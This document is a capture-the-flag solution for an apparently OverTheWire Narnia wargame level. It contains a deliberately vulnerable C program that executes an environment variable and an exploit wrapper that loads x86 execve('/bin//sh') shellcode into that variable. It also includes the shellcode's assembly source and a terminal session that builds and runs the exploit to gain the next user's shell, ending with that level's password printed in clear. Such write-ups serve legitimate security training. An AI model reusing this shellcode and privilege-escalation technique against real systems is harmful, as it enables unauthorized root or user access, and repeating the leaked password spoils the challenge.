/** narnia1.c */
/*
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include <stdio.h>
int main(){
int (*ret)();
if(getenv("EGG")==NULL){
printf("Give me something to execute at the env-variable EGG\n");
exit(1);
}
printf("Trying to execute EGG!\n");
ret = getenv("EGG");
ret();
return 0;
}
/** hacker1.c */
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
extern char **environ;
int main(int argc, char **argv)
{
char shellcode[] = "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80";
setenv("EGG", shellcode, 1);
execle(argv[1], argv[1], NULL, environ);
return 0;
}
;shellcode.asm
BITS 32
global _start
section .text
; syscalls kernel
SYS_EXECVE equ 0x0b
_start:
; execve("/bin//sh", 0, 0);
push SYS_EXECVE ; SYS_EXECVE = 11
pop eax ; set SYS_EXECVE to eax
xor esi, esi ; clean esi
push esi ; esi is zero
push 0x68732f2f ; push 'hs//'
push 0x6e69622f ; push 'nib/'
; execve("/bin//sh/", 0, 0);
; ^
; |
; ebx
mov ebx, esp
; execve("/bin//sh/", 0, 0);
; ^
; |
; ecx
xor ecx, ecx ; clean ecx
; execve("/bin//sh/", 0, 0);
; ^
; |
; edx
mov edx, ecx ; set zero to edx
int 0x80 ; syscall execve
root@today:~# ssh [email protected]
[email protected]'s password:
narnia1@melinda:~$ cd /tmp/shadowcoder1
narnia1@melinda:/tmp/shadowcoder1$ ls
hacker1 hacker1.c narnia1.c shellcode.asm shellcode.o
narnia1@melinda:/tmp/shadowcoder1$ nasm -f elf32 shellcode.asm -g -F stabs -o shellcode.o
narnia1@melinda:/tmp/shadowcoder1$ for i in $(objdump -d shellcode.o | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo
\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80
narnia1@melinda:/tmp/shadowcoder1$ gcc hacker1.c -o hacker1 -m32
narnia1@melinda:/tmp/shadowcoder1$ ./hacker1 /narnia/narnia1
Trying to execute EGG!
$ whoami
narnia2
$ cat /etc/narnia_pass/narnia2
nairiepecu
$